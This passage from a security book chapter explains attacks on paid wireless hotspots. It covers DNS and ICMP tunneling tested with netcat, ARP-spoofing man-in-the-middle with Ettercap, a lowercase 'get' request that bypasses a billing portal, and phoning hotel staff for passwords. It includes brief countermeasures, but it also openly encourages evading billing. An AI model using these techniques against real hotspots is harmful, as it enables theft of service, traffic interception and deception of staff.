Tunneling Attacks

All hotspots offer a limited set of services for free; then they make you pay for premium services. Some hotspots offer more free services than administrators realize. Basic functionality of a hotspot requires DHCP, DNS, and a web portal for gathering information from the user or informing the user of acceptable use.

The most common hotspot business model involves offering a wireless network that is in an area open to potential clients. Normally, informational signs are displayed in the area letting potential clients know about the hotspot and listing the SSID or instructions on how to connect. After the client associates with the hotspot, the client uses DHCP to be automatically assigned an IP address and get information about DNS servers. When the client attempts to surf the Internet, he is redirected to the billing portal instead of the Internet site. For example, the client's home page may be http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome; when the client requests the IP address of http://www.microsoft.com, he will be given the IP address, but the billing gateway will intercept the request and instead of displaying the requested page, the portal will use an HTTP 302 message to redirect the user to the portal. The following text is a sample of the process used in most hotspots:

GET /isapi/redir.dll?prd=ie&pver=6&ar=msnhome HTTP/1.1
Accept: */*
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
Host: www.microsoft.com
Connection: Keep-Alive
Cookie: A=I&I=AxUFAAAAAABTCQAA01oITwpPugXavLGSUeVhmw!!; WT_
FPC=id=24.4.143.114-1062320096.29798824:lv=1156808225515:ss=1156807706437

The following is the intercepted response from the server; the 302 message redirects the client to the portal server:

HTTP/1.1 302 Temporarily Moved
Date: Fri, 24 Nov 2006 22:14:29 GMT
Server:
Location: https://securelogin.corpguestnetwork.domain/cgi-bin/login?cmd=log

in&mac=00:13:ce:45:24:XX&ip=10.0.00.2&essid=GUEST&url=http://www.microsoft.
com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
Content-Length: 0
Connection: close
Content-Type: text/html

The billing portal will authenticate existing clients or gather credit card information for billing. In some hotspots, the portal is just used to get the users to agree to an acceptable use policy. Sometimes a common password is used, such as a code published on the receipt for your latte or a password that you can get from the front desk of the hotel. Social engineering skills may come in handy here. For example, if you are close to a hotel network, you may try calling the reception desk from a house phone and asking for the password.

After the authentication process, the site redirects the client to the originally requested site. In order for this process to work, DNS needs to be functional. If you know how DNS works, it can be used to your advantage. When a DNS server gets a request, it will check its local cache to see if it knows the answer. If it does not have the answer, it will find the answer. This is accomplished by looking up the server for a particular domain and asking the server. So, your DNS request is forwarded from the hotspot to the Internet. You control where the request is sent and thus have a channel for connecting to the Internet.

To make things easier, many hotspot administrators are lazy. Instead of poking a hole for just DNS to a particular server, many hotspots will allow all DNS ports to go anywhere on the Internet. DNS uses TCP and UDP port 53. You can set up a simple proof of concept to test for this vulnerability. The only tool that you need is netcat. netcat is a general network tool that you can use to make connections on most protocols and ports. You can find it for just about any operating system.

Use the following command on the Internet connected server. This will open a listening (-l) connection for a UDP (-u) on port (-p) 53.

dep0t@viper ~
$ nc -l -u -p 53

Now that your server on the Internet is listening, you can connect to your hotspot and send a test message. In this example, the IP address of the machine on the Internet is 10.0.0.1.

dep0t@cobra ~
$ nc -u 10.0.0.1 53
test

In this example, you will need to press ENTER after typing the test message. The message will then be sent to the server. This is what you will see on the server if the connection is successful:

dep0t@viper ~
$ nc -l -u -p 53
test

You can employ this technique as a proof of concept for any TCP or UDP port. Try experimenting with all ports. One way to find if there are any open protocols is by using a port scanner and a sniffer. You set up a sniffer in promiscuous mode on your Internet-connected server. If you see any packets sneak through from a full port scan, you will have identified your channel. Port scanners and sniffers are discussed in Part II of this book and briefly later in the chapter.

In this case, you may need to tunnel over the DNS protocol. As discussed earlier, with functional DNS, the attacker controls the destination of the query and the payload. This is an open channel to the Internet. If the attacker sets up a special DNS server, then the attacker can use the free DNS service for any type of communication. Internet Control Message Protocol (ICMP) is another common protocol that is generally left open on hotspots. There are many tools that can be used for tunneling over DNS and ICMP; ICMPTX and NSTX are good functional tools. Use the reference list at the end of the chapter to find out more information on the current version of these tools.

Tunneling Attack Countermeasures

A few simple modifications to the hotspot will block this attack. Not all hotspots will allow general access to DNS ports to all hosts on the Internet; some hotspot administrators follow information security least privilege practices and only give access to the DNS server offered by the hotspot and block protocols such as ICMP.

Spoofing Attacks

The benefit for an attacker to be local is that she can offer a better level of service for many services. The time it takes for a typical response from a web page, email server, or other service commonly used at a hotspot can vary from 50–200 milliseconds. A local attack could respond in less than a dozen milliseconds. Remember, a wireless hotspot is open for all to eavesdrop, so keeping communications secure is only possible with an encrypted channel. If an attacker waits and listens for a client to request a web page, the locally attached attacker can respond before the legitimate site. The client's web browser will display the page of the first response. Alternatively, the attacker can overwrite the MAC address of the default gateway and have the opportunity to man-in-the-middle (MITM) all traffic destined for other networks. This can be used to eavesdrop on traffic or replace the content of the requests with data from the attacker, for instance, injecting malware onto the victim machines.

There are many tools that can be used to perform a MAC spoofing MITM attack. These tools automate the process of sending out spoofed ARP packets to allow the attacker to pretend to be the router and then complete the connection to the real router after the attacker has a chance to examine or modify the packets. Some common tools are Dug Song dsniff suite, Cain & Abel on Windows, and Ettercap. Figure 9-5 shows an example using Ettercap. In this example, a wireless attacker is eavesdropping on a network administrator using a wired connection to change the configuration of an access point.

Figure 9-5: Using Ettercap to eavesdrop

Billing Attacks

As discussed previously, some hotspots offer free services-some intentionally, some not. Some services such as DNS are critical to the proper functioning of the network. Other protocols such as ICMP may be open on a hotspot that charges for TCP services; these free services that are offered up for convenience may be used to bypass those pesky billing mechanisms. Many protocols can be employed, and your effectiveness will vary depending on the hotspot.

The following method can be used to bypass billing, but I recommend it as a good privacy mechanism. I have set up an SSH server on the Internet that I always use as a proxy when I am using a hotspot. SSH has a very convenient port-forwarding option that allows you to tunnel any TCP service to your secure Internet host. I also run a small HTTP proxy service on my Internet-connected host, so I can use it to evade any content filtering mechanisms or the prying eyes of the hotspot while keeping browser configurations simple. The communication method used is shown in Figure 9-6.

Many platforms used for hotspot management suffer from their own vulnerabilities. One common platform suffers from a simple vulnerability that has not been fixed for years. Normal HTTP GET requests are all uppercase. The following is a sample from a typical HTTP GET request used in an earlier example:

GET /isapi/redir.dll?prd=ie&pver=6&ar=msnhome HTTP/1.1
Accept: */*
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
Host: www.microsoft.com
Connection: Keep-Alive
Cookie: A=I&I=AxUFAAAAAABTCQAA01oITwpPugXavLGSUeVhmw!!; WT_
FPC=id=24.4.143.114-1062320096.29798824:lv=1156808225515:ss=1156807706437

By simply substituting lowercase for the HTTP GET request, you can bypass the annoying billing mechanism. This exploit still works at many hotspots.

get /isapi/redir.dll?prd=ie&pver=6&ar=msnhome HTTP/1.1
Accept: */*
Accept-Language: en-us
UA-CPU: x86

Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
Host: www.microsoft.com
Connection: Keep-Alive
Cookie: A=I&I=AxUFAAAAAABTCQAA01oITwpPugXavLGSUeVhmw!!; WT_
FPC=id=24.4.143.114-1062320096.29798824:lv=1156808225515:ss=1156807706437

Instead of being redirected to the billing portal, my request is allowed to pass. I have used many methods to implement authentication bypass from simple web proxies with regex replacement features to advanced commercial penetration-testing tools.

Many hotels and hotspots charge for a connection per device that connects. That really irritates me because I frequently travel for business with my Windows work laptop and my personal MacBook. It is not fair to double-bill me for my connection, and if I bring along an IP phone, then I could be billed for the connection three times. This technique can also be used if you are hosting a LAN party or have family in other rooms.

Figure 9-6: A method for ensuring privacy when using a hotspot-or to evade those pesky billing mechanisms…

Connection Sharing

Many hotspot networks make you pay per device, so if you have multiple laptops, a PDA, or an IP phone, your five-dollar connection cost can skyrocket quickly. One way to bypass this annoying billing mechanism is by using Internet Connection Sharing. This can be accomplished by using the Internet connection features bundled with Windows or OS X. Also, many Linux distributions can be easily configured for network address translations using multiple interfaces. I, however, am lazy and do not like constantly changing the configuration of my devices, so I have found a way to do this with a cheap piece of hardware.

Using a pocket wireless device that can be configured as an access point, bridge, or NAT router is a convenient way to keep the same configuration on all my devices and only have to change one device as I travel. The device that I use is a D-Link DWL-G730AP. This device has a USB connection that can be used to power the device and a wireless and an Ethernet interface. I configure a wireless network that stays static and use the Ethernet port to plug into a wired hotspot network, mostly at hotels. It comes in a small travel case and has enough power to reach all over your hotel room and can even reach into the next room.